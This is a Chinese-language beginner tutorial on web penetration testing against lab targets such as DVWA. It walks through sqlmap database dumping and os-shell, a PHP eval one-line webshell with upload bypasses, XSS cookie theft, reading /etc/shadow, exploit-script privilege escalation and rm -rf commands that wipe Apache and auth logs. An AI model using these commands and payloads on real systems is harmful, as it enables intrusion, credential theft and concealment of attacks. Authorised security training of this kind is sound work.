🔥 覆盖 Web 渗透全链路操作,附靶场实操细节 + 避坑技巧,零基础也能跟着做,直接对标真实渗透测试流程。
一、Web 渗透前置准备#
1. 环境搭建(新手优先)#
-
核心环境:Kali Linux(虚拟机/物理机,推荐虚拟机) + Web 靶场
- 入门:DVWA(漏洞清晰,适合新手)
- 进阶:VulnStack、OWASP WebGoat
-
辅助工具:Burp Suite、浏览器插件 HackBar / Wappalyzer
-
关键配置:Kali 与靶场位于同一局域网(虚拟机建议桥接模式)
2. 前期信息收集(渗透第一步)#
2.1 网站指纹识别#
whatweb 目标域名配合 Wappalyzer 插件,识别服务器类型、开发语言、数据库,为漏洞挖掘定方向。
2.2 端口与服务扫描#
nmap -sV -p 1-65535 目标IP重点关注:80 / 443 / 3306 / 8080 等端口。
2.3 目录与文件扫描#
dirsearch -u 目标URL -e php,html,txt重点关注后台路径、配置文件、备份文件。
2.4 子域名枚举#
sublist3r -d 目标域名子域名往往防护更弱,是突破口。
3. 渗透核心原则(必须遵守)#
- 仅在合法授权靶场或自建测试环境操作
- 全程记录漏洞与利用步骤,形成实战笔记
- 测试结束后清理痕迹、恢复环境
二、Web 渗透全流程实操#
步骤 1:漏洞扫描(自动化 + 手动)#
Burp Suite 主动扫描#
- 配置浏览器代理 → 导入流量
- 使用 Active Scan 扫描 SQL 注入、XSS、文件上传等漏洞
- 优先处理高危漏洞
Sqlmap SQL 注入检测#
sqlmap -u "URL?参数=值" --dbs示例:
sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1" \
--cookie="security=low; PHPSESSID=xxx" --dbs步骤 2:漏洞利用(三类高危漏洞)#
2.1 SQL 注入利用#
sqlmap -u URL --dbs
sqlmap -u URL -D 数据库名 --tables
sqlmap -u URL -D 数据库名 -T 表名 --dump可进一步尝试:
sqlmap -u URL --os-shell2.2 文件上传漏洞利用#
- 尝试后缀:
php5 / php3 / phtml - 伪装图片头(如
GIF89a) - 上传成功后用 AntSword 连接一句话木马
示例木马:
<?php @eval($_POST['cmd']); ?>
2.3 XSS 跨站漏洞利用#
<script>alert('xss')</script>- 反射型:构造恶意链接
- 存储型:批量获取访问用户 Cookie
- 替换 Cookie 实现冒充登录
步骤 3:后台权限突破#
- 使用 SQL 注入获取的账号登录后台
- 重点功能模块:文件管理 / 插件上传 / 系统设置
- 上传 WebShell 或恶意插件
步骤 4:权限提升(Web → 系统)#
4.1 系统漏洞提权#
uname -a结合 Exploit-DB 查找对应提权漏洞,上传脚本执行:
chmod +x exploit.sh
./exploit.sh4.2 配置错误 / 弱密码提权#
cat /etc/passwd
cat /etc/shadow或读取 Web 配置文件中的数据库 root 密码。
步骤 5:日志清理(靶场环境)#
history -c && history -w
rm -rf /var/log/apache2/access.log
rm -rf /var/log/apache2/error.log
rm -rf /var/log/auth.log⚠️ 仅限合法测试环境。
步骤 6:渗透报告编写#
报告应包含:
- 渗透概述
- 信息收集结果
- 漏洞详情与利用过程
- 修复与加固建议
三、新手避坑指南#
- 扫描无结果 → 检查网络与参数
- 注入失败 → 提高
--level/--risk - 上传成功不可访问 → 检查路径与解析规则
- 提权失败 → 确认系统版本与权限
四、新手进阶建议#
- 靶场顺序:DVWA → VulnStack → OWASP Top 10
- 核心工具优先精通:Burp / Nmap / Sqlmap
- 形成自己的漏洞复现手册
- 严格遵守法律合规
📌 本文适合作为 Web 渗透入门到实战的完整路线图,建议长期保存在个人 Kali / 技术文档站中反复对照实践。